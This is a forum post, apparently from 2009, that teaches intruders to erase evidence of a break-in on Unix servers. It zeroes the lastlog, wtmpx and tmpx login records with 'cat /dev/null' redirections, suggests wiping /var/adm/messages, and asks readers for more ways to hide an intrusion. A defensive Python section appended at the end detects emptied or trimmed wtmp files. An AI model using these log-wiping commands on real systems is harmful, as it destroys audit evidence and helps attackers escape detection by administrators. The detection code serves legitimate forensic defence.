SnEafer
Senior Member
- Apr 1, 2009
I read this article posted by Anton (I think), and somehow he mentioned a few tricks to know when someone has haxed your system.
Well, he did say a few tricks a haxer could use, but I think he wasn't aware of the trick that I'll show below:
Here are some ways of covering your fingerprints on a server using the files that monitor user logins (in Linux/Unix).
We want to erase any trace that will show that we were inside the box. In doing so we'll just:
cat /dev/null > <file>
Lastlog file
Clear out the lastlog file if you're using an existing user from the box. The lastlog file shows when and where a particular user last logged in from.
login: razile
Password:
Last login: Fri Oct 21 21:50:02 2007 from 210.2.9.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
razile@unix-box %
Erase that if you don't want the admin to see where you last logged in from (IP, hostname, time, etc.).
cat /dev/null > /var/adm/lastlogin
After clearing the lastlog file, compare the first login and the second one:
(first login)
Last login: Thu Nov 1 21:33:41 2007 from 210.23.109.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
user@server->
(after deletion)
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
user@server->
wtmpx/tmpx files
If you want to check which users logged in to a Unix box, type in last:
UnixBox# last | more
root pts/21 101.221.224.61 Sat Nov 3 11:38 still logged in
sitescp pts/20 19.168.128.132 Sat Nov 3 07:00 still logged in
root pts/23 101.221.224.51 Sat Nov 3 05:05 still logged in
root pts/22 101.221.224.51 Sat Nov 3 05:05 still logged in
paladel pts/22 14.122.4.99 Fri Nov 2 14:33 - 15:32 (00:59)
boy1 pts/26 14.122.4.67 Fri Nov 2 13:22 - 14:50 (01:28)
boy2 pts/26 14.122.4.67 Fri Nov 2 13:20 - 13:22 (00:02)
You'll see the user who was logged in, the terminal used, the IP where he came from, and the date or duration of his activity in the server.
That is a lot of information, so to cover up your track, delete or zero out the files that store this information:
cat /dev/null > /var/adm/wtmpx
cat /dev/null > /var/adm/tmpx
After doing so, you'll get this when doing last:
# cat /dev/null > /var/adm/wtmpx
# last | more
wtmp begins Sun Nov 4 00:41
#
You could also zero out /var/adm/messages if you're really paranoid.
Of course, doing this is like shouting and telling the whole universe that you were there.
These are just a few ways to cover your track. Do you have any additions? Or any tips on covering the intrusion without anyone knowing that you were there?
**********************
For admins:
Making a copy of every connection on a CD (burning) makes it very hard for a haxer to tamper with that data.
But remember not all admins do that ;-)
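From the admin side, the tip above (keep an independent copy of the login history) can be paired with a check that the live wtmp still agrees with what the current boot would predict. The following is an added example and not code from SnEafer's post; it assumes the glibc/Linux x86_64 `struct utmp` layout of 384-byte records (the Solaris wtmpx shown in the post uses a different layout and is not handled here), and all timestamps, users and addresses in it are constructed (RFC 5737 documentation ranges). The function names `pack_utmp_record`, `parse_wtmp`, `audit_wtmp`, `records_missing_from_live` and `sample_wtmp` are my own.

```python
"""Spot a wtmp file that has been emptied or had its history removed.

Added example, not part of the original post. Assumptions (all constructed):
  - records use the glibc x86_64 `struct utmp` layout (384 bytes each), which
    is what Linux `last` reads; Solaris wtmpx differs and is not handled here;
  - a healthy wtmp carries a BOOT_TIME record (ut_type 2) for the current boot
    followed by the session records written since then;
  - timestamps and addresses below are made up (RFC 5737 ranges).
"""
import struct

UTMP_FMT = "<hxxi32s4s32s256shhiii16s20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384 bytes per record

BOOT_TIME = 2        # ut_type values from <utmp.h>
USER_PROCESS = 7
DEAD_PROCESS = 8

BOOT_T = 1194000000  # constructed boot timestamp (epoch seconds)


def pack_utmp_record(ut_type, pid, line, user, host, ts):
    """Build one utmp record; fields the audit ignores are left zeroed."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, int(ts), 0, b"", b"")


def parse_wtmp(data):
    """Decode a wtmp byte string into a list of dicts, one per record."""
    if len(data) % UTMP_SIZE:
        raise ValueError("length %d is not a multiple of %d" % (len(data), UTMP_SIZE))
    out = []
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        out.append({"type": f[0], "pid": f[1],
                    "line": f[2].rstrip(b"\0").decode(errors="replace"),
                    "user": f[4].rstrip(b"\0").decode(errors="replace"),
                    "host": f[5].rstrip(b"\0").decode(errors="replace"),
                    "time": f[9]})
    return out


def audit_wtmp(data, boot_time, slack=60):
    """Return findings; an empty list means the file is consistent with the boot."""
    if not data:
        return ["wtmp is zero bytes: it was emptied (cat /dev/null > wtmp leaves exactly this)"]
    records = parse_wtmp(data)
    findings = []
    if not any(r["type"] == BOOT_TIME and abs(r["time"] - boot_time) <= slack
               for r in records):
        findings.append("no BOOT_TIME record for the current boot: earlier history is gone")
    earliest = min(r["time"] for r in records)
    if earliest > boot_time + slack:
        findings.append("earliest record (%d) is newer than boot (%d): 'wtmp begins' "
                        "would show a start after boot" % (earliest, boot_time))
    return findings


def _chunks(data):
    return [data[o:o + UTMP_SIZE] for o in range(0, len(data), UTMP_SIZE)]


def records_missing_from_live(live_data, offline_data):
    """Records present in an offline (e.g. burned) copy but absent from the live file."""
    live = set(_chunks(live_data))
    return parse_wtmp(b"".join(c for c in _chunks(offline_data) if c not in live))


def sample_wtmp():
    """Constructed healthy history: one boot, two logins, one logout."""
    return b"".join([
        pack_utmp_record(BOOT_TIME, 0, "~", "reboot", "", BOOT_T),
        pack_utmp_record(USER_PROCESS, 1201, "pts/21", "root", "192.0.2.10", BOOT_T + 3600),
        pack_utmp_record(USER_PROCESS, 1310, "pts/22", "paladel", "198.51.100.7", BOOT_T + 7200),
        pack_utmp_record(DEAD_PROCESS, 1310, "pts/22", "", "", BOOT_T + 10740),
    ])


if __name__ == "__main__":
    healthy = sample_wtmp()
    print("healthy:", audit_wtmp(healthy, BOOT_T))
    print("emptied:", audit_wtmp(b"", BOOT_T))
    trimmed = healthy[UTMP_SIZE:]   # boot record stripped, as if history was cut
    print("trimmed:", audit_wtmp(trimmed, BOOT_T))
    for r in records_missing_from_live(trimmed, healthy):
        print("missing from live copy:", r)
```

On a real Linux host you would read `/var/log/wtmp` and pass the `btime` value from `/proc/stat` as `boot_time`; the offline copy for `records_missing_from_live` is whatever you shipped off the box (write-once media, as the post suggests, or a remote log collector), so a record that exists there but not on the live system is evidence of tampering even when the live file is not empty.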